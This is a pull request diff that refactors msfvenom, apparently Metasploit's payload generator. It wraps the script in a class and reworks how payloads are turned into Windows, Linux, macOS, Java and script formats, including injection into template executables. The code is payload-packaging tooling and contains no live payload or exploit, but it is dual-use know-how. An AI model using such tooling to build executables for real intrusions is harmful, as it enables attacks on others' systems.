### PR TITLE
Refactor msfvenom

### DIFF
--- a/.yardopts
+++ b/.yardopts
@@ -3,5 +3,5 @@
 --exclude \.ut\.rb/
 --exclude \.ts\.rb/
 --files CONTRIBUTING.md,COPYING,HACKING,LICENSE
-#lib/msf/**/*.rb
-#lib/rex/**/*.rb
+lib/msf/**/*.rb
+lib/rex/**/*.rb

--- a/.yardopts
+++ b/.yardopts
@@ -3,5 +3,5 @@
 --exclude \.ut\.rb/
 --exclude \.ts\.rb/
 --files CONTRIBUTING.md,COPYING,HACKING,LICENSE
-lib/msf/**/*.rb
-lib/rex/**/*.rb
+#lib/msf/**/*.rb
+#lib/rex/**/*.rb

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1952,7 +1952,16 @@ End Sub
 	# @return [nil] If the format is unrecognized or the arch and plat don't
 	#   make sense together.
 	def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
-		output = nil
+		# For backwards compatibility with the way this gets called when
+		# generating from Msf::Simple::Payload.generate_simple
+		if arch.kind_of? Array
+			output = nil
+			arch.each do |a|
+				output = to_executable_fmt(framework, a, plat, code, fmt, exeopts)
+				break if output
+			end
+			return output
+		end
 
 		case fmt
 		when 'asp'

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1959,22 +1959,17 @@ End Sub
 			output = Msf::Util::EXE.to_win32pe_aspx(framework, code, exeopts)
 
 		when 'dll'
-			if (not arch or (arch.index(ARCH_X86)))
-				output = Msf::Util::EXE.to_win32pe_dll(framework, code, exeopts)
-			end
-
-			if(arch and (arch.index( ARCH_X86_64 ) or arch.index( ARCH_X64 )))
-				output = Msf::Util::EXE.to_win64pe_dll(framework, code, exeopts)
-			end
-
+			output = case arch
+				when ARCH_X86,nil then to_win32pe_dll(framework, code, exeopts)
+				when ARCH_X86_64  then to_win64pe_dll(framework, code, exeopts)
+				when ARCH_64      then to_win64pe_dll(framework, code, exeopts)
+				end
 		when 'exe'
-			if (not arch or (arch.index(ARCH_X86)))
-				output = Msf::Util::EXE.to_win32pe(framework, code, exeopts)
-			end
-
-			if(arch and (arch.index( ARCH_X86_64 ) or arch.index( ARCH_X64 )))
-				output = Msf::Util::EXE.to_win64pe(framework, code, exeopts)
-			end
+			output = case arch
+				when ARCH_X86,nil then to_win32pe(framework, code, exeopts)
+				when ARCH_X86_64  then to_win64pe(framework, code, exeopts)
+				when ARCH_64      then to_win64pe(framework, code, exeopts)
+				end
 
 		when 'exe-small'
 			if(not arch or (arch.index(ARCH_X86)))
@@ -2009,11 +2004,6 @@ End Sub
 					when ARCH_X86,nil then to_solaris_x86_elf(framework, code, exeopts)
 					end
 			end
-
-		# this should really be 'jar'
-		when 'java'
-
-
 
 		when 'macho'
 			output = case arch

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1993,12 +1993,12 @@ End Sub
 		when 'elf'
 			if (not plat or (plat.index(Msf::Module::Platform::Linux)))
 				output = case arch
-					when ARCH_X86,nil then Msf::Util::EXE.to_linux_x86_elf(framework, code, exeopts)
-					when ARCH_X86_64  then Msf::Util::EXE.to_linux_x64_elf(framework, code, exeopts)
-					when ARCH_X64     then Msf::Util::EXE.to_linux_x64_elf(framework, code, exeopts)
-					when ARCH_ARMLE   then Msf::Util::EXE.to_linux_armle_elf(framework, code, exeopts)
-					when ARCH_MIPSBE  then Msf::Util::EXE.to_linux_mipsbe_elf(framework, code, exeopts)
-					when ARCH_MIPSLE  then Msf::Util::EXE.to_linux_mipsle_elf(framework, code, exeopts)
+					when ARCH_X86,nil then to_linux_x86_elf(framework, code, exeopts)
+					when ARCH_X86_64  then to_linux_x64_elf(framework, code, exeopts)
+					when ARCH_X64     then to_linux_x64_elf(framework, code, exeopts)
+					when ARCH_ARMLE   then to_linux_armle_elf(framework, code, exeopts)
+					when ARCH_MIPSBE  then to_linux_mipsbe_elf(framework, code, exeopts)
+					when ARCH_MIPSLE  then to_linux_mipsle_elf(framework, code, exeopts)
 					end
 			elsif(plat and (plat.index(Msf::Module::Platform::BSD)))
 				output = case arch
@@ -2006,17 +2006,22 @@ End Sub
 					end
 			elsif(plat and (plat.index(Msf::Module::Platform::Solaris)))
 				output = case arch
-					when ARCH_X86,nil then Msf::Util::EXE.to_solaris_x86_elf(framework, code, exeopts)
+					when ARCH_X86,nil then to_solaris_x86_elf(framework, code, exeopts)
 					end
 			end
 
+		# this should really be 'jar'
+		when 'java'
+
+
+
 		when 'macho'
 			output = case arch
-				when ARCH_X86,nil then Msf::Util::EXE.to_osx_x86_macho(framework, code, exeopts)
-				when ARCH_X86_64  then Msf::Util::EXE.to_osx_x64_macho(framework, code, exeopts)
-				when ARCH_X64     then Msf::Util::EXE.to_osx_x64_macho(framework, code, exeopts)
-				when ARCH_ARMLE   then Msf::Util::EXE.to_osx_arm_macho(framework, code, exeopts)
-				when ARCH_PPC     then Msf::Util::EXE.to_osx_ppc_macho(framework, code, exeopts)
+				when ARCH_X86,nil then to_osx_x86_macho(framework, code, exeopts)
+				when ARCH_X86_64  then to_osx_x64_macho(framework, code, exeopts)
+				when ARCH_X64     then to_osx_x64_macho(framework, code, exeopts)
+				when ARCH_ARMLE   then to_osx_arm_macho(framework, code, exeopts)
+				when ARCH_PPC     then to_osx_ppc_macho(framework, code, exeopts)
 				end
 
 		when 'vba'

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -365,8 +365,11 @@ require 'digest/sha1'
 
 	def self.to_winpe_only(framework, code, opts={}, arch="x86")
 
-		# Allow the user to specify their own EXE template
+		if arch == ARCH_X86_64
+			arch = ARCH_X64
+		end
 
+		# Allow the user to specify their own EXE template
 		set_template_default(opts, "template_"+arch+"_windows.exe")
 
 		pe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
@@ -1962,28 +1965,26 @@ End Sub
 			output = case arch
 				when ARCH_X86,nil then to_win32pe_dll(framework, code, exeopts)
 				when ARCH_X86_64  then to_win64pe_dll(framework, code, exeopts)
-				when ARCH_64      then to_win64pe_dll(framework, code, exeopts)
+				when ARCH_X64     then to_win64pe_dll(framework, code, exeopts)
 				end
 		when 'exe'
 			output = case arch
 				when ARCH_X86,nil then to_win32pe(framework, code, exeopts)
 				when ARCH_X86_64  then to_win64pe(framework, code, exeopts)
-				when ARCH_64      then to_win64pe(framework, code, exeopts)
+				when ARCH_X64     then to_win64pe(framework, code, exeopts)
 				end
 
 		when 'exe-small'
-			if(not arch or (arch.index(ARCH_X86)))
-				output = Msf::Util::EXE.to_win32pe_old(framework, code, exeopts)
-			end
+			output = case arch
+				when ARCH_X86,nil then to_win32pe_old(framework, code, exeopts)
+				end
 
 		when 'exe-only'
-			if(not arch or (arch.index(ARCH_X86)))
-				output = Msf::Util::EXE.to_winpe_only(framework, code, exeopts)
-			end
-
-			if(arch and (arch.index( ARCH_X86_64 ) or arch.index( ARCH_X64 )))
-				output = Msf::Util::EXE.to_winpe_only(framework, code, exeopts, "x64")
-			end
+			output = case arch
+				when ARCH_X86,nil then to_winpe_only(framework, code, exeopts, arch)
+				when ARCH_X86_64  then to_winpe_only(framework, code, exeopts, arch)
+				when ARCH_X64     then to_winpe_only(framework, code, exeopts, arch)
+				end
 
 		when 'elf'
 			if (not plat or (plat.index(Msf::Module::Platform::Linux)))

--- a/msfconsole
+++ b/msfconsole
@@ -100,7 +100,7 @@ class OptsConsole
 				options['DatabaseMigrationPaths'] ||= []
 				options['DatabaseMigrationPaths'] << m
 			end
-			
+
 			opts.on("-e", "--environment <production|development>", "Specify the database environment to load from the YAML") do |m|
 				options['DatabaseEnv'] = m
 			end

--- a/msfvenom
+++ b/msfvenom
@@ -1,9 +1,6 @@
 #!/usr/bin/env ruby
 # -*- coding: binary -*-
-#
-# $Id: msfvenom 14909 2012-03-10 06:50:03Z rapid7 $
-# $Revision: 14909 $
-#
+
 msfbase = __FILE__
 while File.symlink?(msfbase)
 	msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
@@ -426,107 +423,54 @@ end
 
 $stdout.binmode
 
-if opts[:format] !~/^(ruby|rb|perl|pl|bash|sh|c|csharp|js|dll|elf)$/i
-	exe = Msf::Util::EXE.to_executable_fmt($framework, opts[:arch], opts[:platform], payload_raw, opts[:format], exeopts)
-end
+case opts[:format].downcase
+# Special-case this to check endianness
+when "js_be"
 
-case opts[:format]
-when /^(ruby|rb|perl|pl|bash|sh|c|csharp|js_le|raw|py)$/i
-	$stdout.write Msf::Simple::Buffer.transform(payload_raw, opts[:format])
-when /^asp$/
-	asp = Msf::Util::EXE.to_win32pe_asp($framework, payload_raw, exeopts)
-	$stdout.puts asp
-when /^aspx$/
-	aspx = Msf::Util::EXE.to_win32pe_aspx($framework, payload_raw, exeopts)
-	$stdout.puts aspx
-when /^js_be$/i
 	if Rex::Arch.endian(payload.arch) != ENDIAN_BIG
 		print_error("Big endian format selected for a non big endian payload")
 		exit
 	end
-	$stdout.puts Msf::Simple::Buffer.transform(payload_raw, opts[:format])
-when /^java$/i
-	if(!exe and payload.platform.platforms.index(Msf::Module::Platform::Java))
-		exe = payload.generate_jar.pack
-	end
+	$stdout.write Msf::Simple::Buffer.transform(payload_raw, opts[:format])
 
-	if exe
-		$stdout.write exe
-	else
-		print_error("Could not generate payload format")
-	end
-when /^elf$/i
-	if (opts[:platform].index(Msf::Module::Platform::Linux))
-		elf = case opts[:arch]
-			when /^x64$/; Msf::Util::EXE.to_linux_x64_elf($framework, payload_raw, exeopts)
-			when /^x86$/; Msf::Util::EXE.to_linux_x86_elf($framework, payload_raw, exeopts)
-			when /^arm$/; Msf::Util::EXE.to_linux_armle_elf($framework, payload_raw, exeopts)
-			end
-	elsif(opts[:platform].index(Msf::Module::Platform::BSD))
-		elf = case opts[:arch]
-			when /^x86$/; Msf::Util::EXE.to_bsd_x86_elf($framework, payload_raw, exeopts)
-			end
-	elsif(opts[:platform].index(Msf::Module::Platform::Solaris))
-		elf = case opts[:arch]
-			when /^x86$/; Msf::Util::EXE.to_solaris_x86_elf($framework, payload_raw, exeopts)
-			end
-	end
-	if elf.nil?
-		print_error("This format does not support that architecture")
-		exit
-	end
-	$stdout.write elf
-when /^macho$/i
-	bin = case opts[:arch]
-		when /^x64$/; Msf::Util::EXE.to_osx_x64_macho($framework, payload_raw, exeopts)
-		when /^x86$/; Msf::Util::EXE.to_osx_x86_macho($framework, payload_raw, exeopts)
-		when /^arm$/; Msf::Util::EXE.to_osx_arm_macho($framework, payload_raw, exeopts)
-		when /^ppc$/; Msf::Util::EXE.to_osx_ppc_macho($framework, payload_raw, exeopts)
-		end
-	if bin.nil?
-		print_error("This format does not support that architecture")
-		exit
-	end
-	$stdout.write bin
-when /^dll$/i
-	dll = case opts[:arch]
-		when /^x86$/;        Msf::Util::EXE.to_win32pe_dll($framework, payload_raw)
-		when /^(x64|x86_64)$/; Msf::Util::EXE.to_win64pe_dll($framework, payload_raw)
-		end
-	if dll.nil?
-		print_error("This format does not support that architecture")
-		exit
-	end
-
-	$stdout.write dll
-when /^exe$/i
-	$stdout.write exe
-when /^exe-small$/i
-when /^vba$/i
-	vba = Msf::Util::EXE.to_vba($framework, payload_raw)
-	$stdout.puts vba
-when /^vba-exe$/i
-	exe = Msf::Util::EXE.to_win32pe($framework, payload_raw)
-	vba = Msf::Util::EXE.to_exe_vba(exe)
-	$stdout.puts vba
-when /^vbs$/i
-	exe = Msf::Util::EXE.to_win32pe($framework, payload_raw)
-	vbs = Msf::Util::EXE.to_exe_vbs(exe)
-	$stdout.puts vbs
-when /^war$/i
+# Special-case this so we can build a war directly from the payload if
+# possible
+when "war"
+	exe = Msf::Util::EXE.to_executable_fmt($framework, opts[:arch], opts[:platform], payload_raw, opts[:format], exeopts)
 	if (!exe and payload.platform.platforms.index(Msf::Module::Platform::Java))
 		exe = payload.generate_war.pack
 	else
 		exe = Msf::Util::EXE.to_jsp_war(exe)
 	end
 	$stdout.write exe
-when /^psh$/i
-	psh = Msf::Util::EXE.to_win32pe_psh($framework, payload_raw, exeopts)
-	$stdout.write psh
-when /^psh-net$/i
-	psh = Msf::Util::EXE.to_win32pe_psh_net($framework, payload_raw, exeopts)
-	$stdout.write psh
+
+# Same as war, special-case this so we can build a jar directly from the
+# payload if possible
+when "java"
+	exe = Msf::Util::EXE.to_executable_fmt($framework, opts[:arch], opts[:platform], payload_raw, opts[:format], exeopts)
+	if(!exe and payload.platform.platforms.index(Msf::Module::Platform::Java))
+		exe = payload.generate_jar.pack
+	end
+	if exe
+		$stdout.write exe
+	else
+		print_error("Could not generate payload format")
+	end
+
+when *Msf::Simple::Buffer.transform_formats
+	$stdout.write Msf::Simple::Buffer.transform(payload_raw, opts[:format])
+
+when *Msf::Util::EXE.to_executable_fmt_formats
+	exe = Msf::Util::EXE.to_executable_fmt($framework, opts[:arch], opts[:platform], payload_raw, opts[:format], exeopts)
+	if exe.nil?
+		print_error("This format does not support that platform/architecture")
+		exit
+	end
+	$stdout.write exe
+
 else
 	print_error("Unsupported format")
 	exit
 end
+
+

--- a/msfvenom
+++ b/msfvenom
@@ -16,6 +16,13 @@ require 'rex'
 require 'msf/ui'
 require 'msf/base'
 
+# Mad payload generation
+#
+# @example
+#   venom = MsfVenom.new
+#   # ARGV will be parsed destructively!
+#   venom.parse_args(ARGV)
+#   $stdout.puts venom.generate
 class MsfVenom
   class MsfVenomError < StandardError; end
   class UsageError < MsfVenomError; end
@@ -34,6 +41,11 @@ class MsfVenom
     @framework = framework
   end
 
+  # Creates a new framework object.
+  #
+  # @note Ignores any previously cached value
+  # @param (see ::Msf::Simple::Framework.create)
+  # @return [Msf::Framework]
   def init_framework(create_opts={})
     create_opts[:module_types] ||= [
       ::Msf::MODULE_PAYLOAD, ::Msf::MODULE_ENCODER, ::Msf::MODULE_NOP
@@ -41,6 +53,9 @@ class MsfVenom
     @framework = ::Msf::Simple::Framework.create(create_opts.merge('DisableDatabase' => true))
   end
 
+  # Cached framework object
+  #
+  # @return [Msf::Framework]
   def framework
     return @framework if @framework
 
@@ -49,6 +64,10 @@ class MsfVenom
     @framework
   end
 
+  # Initialize the options for this run from ARGV
+  # @param args [Array] Usually ARGV. Parsed destructively.
+  # @return [void]
+  # @raise [UsageError] When given invalid options
   def parse_args(args)
     @opts = {}
     @datastore = {}
@@ -181,6 +200,10 @@ class MsfVenom
     encoders
   end
 
+  # Read a raw payload from stdin (or whatever IO object we're currently
+  # using as stdin, see {#initialize})
+  #
+  # @return [String]
   def payload_stdin
     @in.binmode
     payload = @in.read
@@ -189,7 +212,7 @@ class MsfVenom
 
   def generate_nops(arch, len, nop_mod=nil, nop_opts={})
     nop_opts['BadChars'] ||= ''
-    nop_jpts['SaveRegisters'] ||= [ 'esp', 'ebp', 'esi', 'edi' ]
+    nop_opts['SaveRegisters'] ||= [ 'esp', 'ebp', 'esi', 'edi' ]
 
     if nop_mod
       nop = framework.nops.create(nop_mod)
@@ -267,7 +290,32 @@ class MsfVenom
     "\n" + tbl.to_s + "\n"
   end
 
+  # @return [String] A raw shellcode blob
+  # @return [nil] When commandline options conspire to produce no output
   def generate_raw_payload
+    if @opts[:list]
+      @opts[:list].each do |mod|
+        case mod.downcase
+        when "payloads"
+          @err.puts dump_payloads
+        when "encoders"
+          @err.puts dump_encoders(@opts[:arch])
+        when "nops"
+          @err.puts dump_nops
+        when "all"
+          # Init here so #dump_payloads doesn't create a framework with
+          # only payloads, etc.
+          init_framework
+          @err.puts dump_payloads
+          @err.puts dump_encoders
+          @err.puts dump_nops
+        else
+          raise UsageError, "Invalid module type"
+        end
+      end
+      return
+    end
+
     if @opts[:payload] == 'stdin'
       payload_raw = payload_stdin
       if @opts[:encode] and (@opts[:arch].nil? or @opts[:platform].nil?)
@@ -307,29 +355,8 @@ class MsfVenom
   end
 
 
+  # Main dispatch method to do the right thing with the given options.
   def generate
-    if @opts[:list]
-      @opts[:list].each do |mod|
-        case mod.downcase
-        when "payloads"
-          @err.puts dump_payloads
-        when "encoders"
-          @err.puts dump_encoders(@opts[:arch])
-        when "nops"
-          @err.puts dump_nops
-        when "all"
-          # Init here so #dump_payloads doesn't create a framework with
-          # only payloads, etc.
-          init_framework
-          @err.puts dump_payloads
-          @err.puts dump_encoders
-          @err.puts dump_nops
-        else
-          print_error("Invalid module type")
-        end
-      end
-      return
-    end
 
     # Normalize the options
     @opts[:platform] = ::Msf::Module::PlatformList.transform(@opts[:platform]) if @opts[:platform]

--- a/msfvenom
+++ b/msfvenom
@@ -340,6 +340,7 @@ class MsfVenom
 
 
     payload_raw = generate_raw_payload
+    return unless payload_raw
 
     if @opts[:template]
       unless File.exist?(@opts[:template])

--- a/msfvenom
+++ b/msfvenom
@@ -293,28 +293,6 @@ class MsfVenom
   # @return [String] A raw shellcode blob
   # @return [nil] When commandline options conspire to produce no output
   def generate_raw_payload
-    if @opts[:list]
-      @opts[:list].each do |mod|
-        case mod.downcase
-        when "payloads"
-          @err.puts dump_payloads
-        when "encoders"
-          @err.puts dump_encoders(@opts[:arch])
-        when "nops"
-          @err.puts dump_nops
-        when "all"
-          # Init here so #dump_payloads doesn't create a framework with
-          # only payloads, etc.
-          init_framework
-          @err.puts dump_payloads
-          @err.puts dump_encoders
-          @err.puts dump_nops
-        else
-          raise UsageError, "Invalid module type"
-        end
-      end
-      return
-    end
 
     if @opts[:payload] == 'stdin'
       payload_raw = payload_stdin
@@ -357,6 +335,28 @@ class MsfVenom
 
   # Main dispatch method to do the right thing with the given options.
   def generate
+    if @opts[:list]
+      @opts[:list].each do |mod|
+        case mod.downcase
+        when "payloads"
+          @err.puts dump_payloads
+        when "encoders"
+          @err.puts dump_encoders(@opts[:arch])
+        when "nops"
+          @err.puts dump_nops
+        when "all"
+          # Init here so #dump_payloads doesn't create a framework with
+          # only payloads, etc.
+          init_framework
+          @err.puts dump_payloads
+          @err.puts dump_encoders
+          @err.puts dump_nops
+        else
+          raise UsageError, "Invalid module type"
+        end
+      end
+      return
+    end
 
     # Normalize the options
     @opts[:platform] = ::Msf::Module::PlatformList.transform(@opts[:platform]) if @opts[:platform]

--- a/msfvenom
+++ b/msfvenom
@@ -10,467 +10,462 @@ $:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib')))
 require 'fastlib'
 require 'msfenv'
 
-
 $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
-
-Status = "[*] "
-Error = "[-] "
-
-require 'optparse'
-
-def parse_args
-	opts = {}
-	datastore = {}
-	opt = OptionParser.new
-	opt.banner = "Usage: #{$0} [options] <var=val>"
-	opt.separator('')
-	opt.separator('Options:')
-
-	opt.on('-p', '--payload    [payload]', String, 'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p|
-		if p == '-'
-			opts[:payload] = 'stdin'
-		else
-			opts[:payload] = p
-		end
-	end
-
-	opt.on('-l', '--list       [module_type]', Array, 'List a module type example: payloads, encoders, nops, all') do |l|
-		if l.nil? or l.empty?
-			l = ["all"]
-		end
-		opts[:list] = l
-	end
-
-	opt.on('-n', '--nopsled    [length]', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n|
-		opts[:nopsled] = n.to_i
-	end
-
-	opt.on('-f', '--format     [format]', String, 'Output format (use --help-formats for a list)') do |f|
-		opts[:format] = f
-	end
-
-	opt.on('-e', '--encoder    [encoder]', String, 'The encoder to use') do |e|
-		opts[:encode] = true
-		opts[:encoder] = e
-	end
-
-	opt.on('-a', '--arch       [architecture]', String, 'The architecture to use') do |a|
-		opts[:arch] = a
-	end
-
-	opt.on('--platform   [platform]', String, 'The platform of the payload') do |l|
-		opts[:platform] = l
-	end
-
-	opt.on('-s', '--space      [length]', Integer, 'The maximum size of the resulting payload') do |s|
-		opts[:space] = s
-	end
-
-	opt.on('-b', '--bad-chars  [list]', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b|
-		opts[:badchars] = b
-	end
-
-	opt.on('-i', '--iterations [count]', Integer, 'The number of times to encode the payload') do |i|
-		opts[:iterations] = i
-	end
-
-	opt.on('-c', '--add-code   [path]', String, 'Specify an additional win32 shellcode file to include') do |x|
-		opts[:addshellcode] = x
-	end
-
-	opt.on('-x', '--template   [path]', String, 'Specify a custom executable file to use as a template') do |x|
-		opts[:template] = x
-		unless File.exist?(x)
-			$stderr.puts "Template file (#{x}) does not exist"
-			exit 1
-		end
-	end
-
-	opt.on('-k', '--keep', 'Preserve the template behavior and inject the payload as a new thread') do
-		opts[:inject] = true
-	end
-
-	opt.on('-o', '--options', 'List the payload\'s standard options') do
-		opts[:list_options] = true
-	end
-
-	opt.on_tail('-h', '--help', 'Show this message') do
-		$stderr.puts opt
-		exit(1)
-	end
-
-	opt.on_tail('--help-formats', String, 'List available formats') do
-		require 'rex'
-		require 'msf/ui'
-		require 'msf/base'
-		$framework = Msf::Simple::Framework.create(
-			:module_types => [],
-			'DisableDatabase' => true
-		)
-		puts "Executable formats"
-		puts "\t" + Msf::Util::EXE.to_executable_fmt_formats.join(", ")
-		puts "Transform formats"
-		puts "\t" + Msf::Simple::Buffer.transform_formats.join(", ")
-		exit 1
-	end
-
-	begin
-		opt.parse!
-	rescue OptionParser::InvalidOption, OptionParser::MissingArgument
-		puts "Invalid option, try -h for usage"
-		exit(1)
-	end
-
-	args = ARGV.dup
-	if args
-		args.each do |x|
-			k,v = x.split('=', 2)
-			datastore[k.upcase] = v.to_s
-		end
-	end
-
-	if opts.empty?
-		puts "no options"
-		puts opt
-		exit(1)
-	end
-
-	if opts[:payload].nil? # if no payload option is selected assume we are reading it from stdin
-		opts[:payload] = "stdin"
-	end
-
-	return [datastore, opts]
-end
-
-def print_status(msg)
-	$stderr.puts(Status + msg)
-end
-
-def print_error(msg)
-	$stderr.puts(Error + msg)
-end
-
-def get_encoders(arch, encoder)
-	encoders = []
-
-	if (encoder)
-		encoders << $framework.encoders.create(encoder)
-	else
-		$framework.encoders.each_module_ranked(
-			'Arch' => arch ? arch.split(',') : nil) { |name, mod|
-			encoders << mod.new
-		}
-	end
-
-	encoders
-end
-
-def payload_stdin
-	$stdin.binmode
-	payload = $stdin.read
-	payload
-end
-
-def generate_nops(arch, len, nop_mod=nil, opts={})
-	opts['BadChars'] ||= ''
-	opts['SaveRegisters'] ||= [ 'esp', 'ebp', 'esi', 'edi' ]
-
-	if nop_mod
-		nop = $framework.nops.create(nop_mod)
-		raw = nop.generate_sled(len, opts)
-		return raw if raw
-	end
-
-	$framework.nops.each_module_ranked('Arch' => arch) do |name, mod|
-		begin
-			nop = $framework.nops.create(name)
-			raw = nop.generate_sled(len, opts)
-			return raw if raw
-		rescue
-		end
-	end
-	nil
-end
-
-def dump_payloads
-	tbl = Rex::Ui::Text::Table.new(
-		'Indent'  => 4,
-		'Header'  => "Framework Payloads (#{$framework.stats.num_payloads} total)",
-		'Columns' =>
-			[
-				"Name",
-				"Description"
-			])
-
-	$framework.payloads.each_module { |name, mod|
-		tbl << [ name, mod.new.description ]
-	}
-
-	"\n" + tbl.to_s + "\n"
-end
-
-def dump_encoders(arch = nil)
-	tbl = Rex::Ui::Text::Table.new(
-		'Indent'  => 4,
-		'Header'  => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""),
-		'Columns' =>
-			[
-				"Name",
-				"Rank",
-				"Description"
-			])
-	cnt = 0
-
-	$framework.encoders.each_module(
-		'Arch' => arch ? arch.split(',') : nil) { |name, mod|
-		tbl << [ name, mod.rank_to_s, mod.new.name ]
-
-		cnt += 1
-	}
-
-	(cnt > 0) ? "\n" + tbl.to_s + "\n" : "\nNo compatible encoders found.\n\n"
-end
-
-def dump_nops
-	tbl = Rex::Ui::Text::Table.new(
-		'Indent'  => 4,
-		'Header'  => "Framework NOPs (#{$framework.stats.num_nops} total)",
-		'Columns' =>
-			[
-				"Name",
-				"Description"
-			])
-
-	$framework.nops.each_module { |name, mod|
-		tbl << [ name, mod.new.description ]
-	}
-
-	"\n" + tbl.to_s + "\n"
-end
-
-datastore, opts = parse_args
 
 require 'rex'
 require 'msf/ui'
 require 'msf/base'
 
-$framework ||= Msf::Simple::Framework.create(
-	:module_types => [Msf::MODULE_PAYLOAD, Msf::MODULE_ENCODER, Msf::MODULE_NOP],
-	'DisableDatabase' => true
-)
+class MsfVenom
+  class MsfVenomError < StandardError; end
+  class UsageError < MsfVenomError; end
+  class NoTemplateError < MsfVenomError; end
 
-if opts[:list]
-	opts[:list].each do |mod|
-		case mod
-		when /^payloads$/i
-			$stderr.puts dump_payloads
-		when /^encoders$/i
-			$stderr.puts dump_encoders(opts[:arch])
-		when /^nops$/i
-			$stderr.puts dump_nops
-		when /^all$/i
-			$stderr.puts dump_payloads
-			$stderr.puts dump_encoders
-			$stderr.puts dump_nops
-		else
-			print_error("Invalid module type")
-		end
-	end
-	exit
+  Status = "[*] "
+  Error = "[-] "
+
+  require 'optparse'
+
+  def init_framework(create_opts={})
+    return @framework if @framework
+    create_opts[:module_types] ||= [
+      ::Msf::MODULE_PAYLOAD, ::Msf::MODULE_ENCODER, ::Msf::MODULE_NOP
+    ]
+    @framework = ::Msf::Simple::Framework.create(create_opts.merge('DisableDatabase' => true))
+  end
+
+  def parse_args(args)
+    @opts = {}
+    @datastore = {}
+    opt = OptionParser.new
+    opt.banner = "Usage: #{$0} [options] <var=val>"
+    opt.separator('')
+    opt.separator('Options:')
+
+    opt.on('-p', '--payload    [payload]', String, 'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p|
+      if p == '-'
+        @opts[:payload] = 'stdin'
+      else
+        @opts[:payload] = p
+      end
+    end
+
+    opt.on('-l', '--list       [module_type]', Array, 'List a module type example: payloads, encoders, nops, all') do |l|
+      if l.nil? or l.empty?
+        l = ["all"]
+      end
+      @opts[:list] = l
+    end
+
+    opt.on('-n', '--nopsled    [length]', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n|
+      @opts[:nopsled] = n.to_i
+    end
+
+    opt.on('-f', '--format     [format]', String, "Output format (use --help-formats for a list)") do |f|
+      @opts[:format] = f
+    end
+
+    opt.on('-e', '--encoder    [encoder]', String, 'The encoder to use') do |e|
+      @opts[:encode] = true
+      @opts[:encoder] = e
+    end
+
+    opt.on('-a', '--arch       [architecture]', String, 'The architecture to use') do |a|
+      @opts[:arch] = a
+    end
+
+    opt.on('--platform   [platform]', String, 'The platform of the payload') do |l|
+      @opts[:platform] = l
+    end
+
+    opt.on('-s', '--space      [length]', Integer, 'The maximum size of the resulting payload') do |s|
+      @opts[:space] = s
+    end
+
+    opt.on('-b', '--bad-chars  [list] ', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b|
+      @opts[:badchars] = b
+    end
+
+    opt.on('-i', '--iterations [count] ', Integer, 'The number of times to encode the payload') do |i|
+      @opts[:iterations] = i
+    end
+
+    opt.on('-c', '--add-code   [path] ', String, 'Specify an additional win32 shellcode file to include') do |x|
+      @opts[:addshellcode] = x
+    end
+
+    opt.on('-x', '--template   [path] ', String, 'Specify a custom executable file to use as a template') do |x|
+      @opts[:template] = x
+    end
+
+    opt.on('-k', '--keep', 'Preserve the template behavior and inject the payload as a new thread') do
+      @opts[:inject] = true
+    end
+
+    opt.on('-o', '--options', "List the payload's standard options") do
+      @opts[:list_options] = true
+    end
+
+    opt.on_tail('-h', '--help', 'Show this message') do
+      raise UsageError, "#{opt}"
+    end
+
+    opt.on_tail('--help-formats', String, "List available formats") do
+      init_framework(:module_types => [])
+      msg = "Executable formats\n" +
+            "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" +
+            "Transform formats\n" +
+            "\t" + ::Msf::Simple::Buffer.transform_formats.join(", ")
+      raise UsageError, msg
+    end
+
+    begin
+      opt.parse!
+    rescue OptionParser::InvalidOption => e
+      p e
+      raise UsageError, "Invalid option\n#{opt}"
+    rescue OptionParser::MissingArgument => e
+      p e
+    end
+
+    if @opts.empty?
+      raise UsageError, "No options\n#{opt}"
+    end
+
+    if args
+      args.each do |x|
+        k,v = x.split('=', 2)
+        @datastore[k.upcase] = v.to_s
+      end
+    end
+
+    if @opts[:payload].nil? # if no payload option is selected assume we are reading it from stdin
+      @opts[:payload] = "stdin"
+    end
+  end
+
+  def print_status(msg)
+    $stderr.puts(Status + msg)
+  end
+
+  def print_error(msg)
+    $stderr.puts(Error + msg)
+  end
+
+  def get_encoders(arch, encoder)
+    encoders = []
+
+    if (encoder)
+      encoders << @framework.encoders.create(encoder)
+    else
+      @framework.encoders.each_module_ranked(
+          'Arch' => arch ? arch.split(',') : nil) { |name, mod|
+        encoders << mod.new
+      }
+    end
+
+    encoders
+  end
+
+  def payload_stdin
+    $stdin.binmode
+    payload = $stdin.read
+    payload
+  end
+
+  def generate_nops(arch, len, nop_mod=nil, nop_opts={})
+    nop_opts['BadChars'] ||= ''
+    nop_jpts['SaveRegisters'] ||= [ 'esp', 'ebp', 'esi', 'edi' ]
+
+    if nop_mod
+      nop = @framework.nops.create(nop_mod)
+      raw = nop.generate_sled(len, nop_opts)
+      return raw if raw
+    end
+
+    @framework.nops.each_module_ranked('Arch' => arch) do |name, mod|
+      begin
+        nop = @framework.nops.create(name)
+        raw = nop.generate_sled(len, nop_opts)
+        return raw if raw
+      rescue
+      end
+    end
+    nil
+  end
+
+  def dump_payloads
+    init_framework(:module_types => [ ::Msf::MODULE_PAYLOAD ])
+    tbl = Rex::Ui::Text::Table.new(
+        'Indent'  => 4,
+        'Header'  => "Framework Payloads (#{@framework.stats.num_payloads} total)",
+        'Columns' =>
+            [
+                "Name",
+                "Description"
+            ])
+
+    @framework.payloads.each_module { |name, mod|
+      tbl << [ name, mod.new.description ]
+    }
+
+    "\n" + tbl.to_s + "\n"
+  end
+
+  def dump_encoders(arch = nil)
